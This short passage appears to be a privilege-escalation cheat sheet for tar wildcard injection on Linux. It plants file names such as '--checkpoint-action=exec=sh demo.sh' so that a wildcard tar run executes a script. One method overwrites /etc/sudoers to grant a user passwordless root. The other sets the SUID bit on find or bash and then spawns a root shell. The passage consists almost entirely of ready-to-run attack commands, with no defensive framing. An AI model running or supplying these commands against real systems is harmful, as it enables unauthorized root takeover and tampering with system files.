### Method 1: Exploit `sudoers` file ```bash echo 'echo "wook ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh echo "" > "--checkpoint-action=exec=sh demo.sh" echo "" > --checkpoint=1 tar cf archive.tar * ``` ### Method2: Give SUID permission to system binary ```bash echo "chmod u+s /usr/bin/find" > test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > --checkpoint=1 tar cf archive.tar * ls -al /usr/bin/find find f1 -exec "whoami" \; root find f1 -exec "/bin/sh" \; id whoami --- # OR more simply echo "chmod u+s /bin/bash" > test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > --checkpoint=1 ```